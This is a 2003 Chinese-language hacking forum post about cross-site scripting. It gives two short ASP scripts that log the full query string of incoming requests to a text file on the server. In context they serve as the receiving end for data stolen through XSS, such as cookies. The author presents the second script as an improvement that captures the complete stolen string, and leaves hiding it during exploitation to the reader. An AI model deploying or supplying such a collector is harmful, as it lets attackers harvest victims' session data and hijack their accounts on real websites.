| [这个贴子最后由darkeyes在 2003/11/23 07:53pm 第 1 次编辑]
今天一大早起来,准备花个把小时,实验一下跨站脚本,没想到一弄就是一天,5555555
因为用lcx的那段代码只能得到&号前面的信息,本来我也不知道,这是经过N次失败的经验,
先给出lcx的代码
<%
testfile=Server.MapPath("lcx.txt")
msg=Request("msg")
fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
郁闷了一天,我翻书翻啊翻(书真是个好东东,:P),终于让我找到request.servervariables(QUERY_STRING)也一样可得到http请求中问号后的信息,
具体代码如下,
<%
testfile=Server.MapPath("darkeyes.txt")
msg=request.servervariables("QUERY_STRING")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.opentextfile(testfile,8,true,0)
thisfile.WriteLine(""&msg&"")
thisfile.close
set fs = nothing
%>
这样就可以得到?号后完整的信息,而不再是不完整的了.至于利用的时候隐蔽性问题,俺就不多说了,自己去发挥吧,呵呵! |
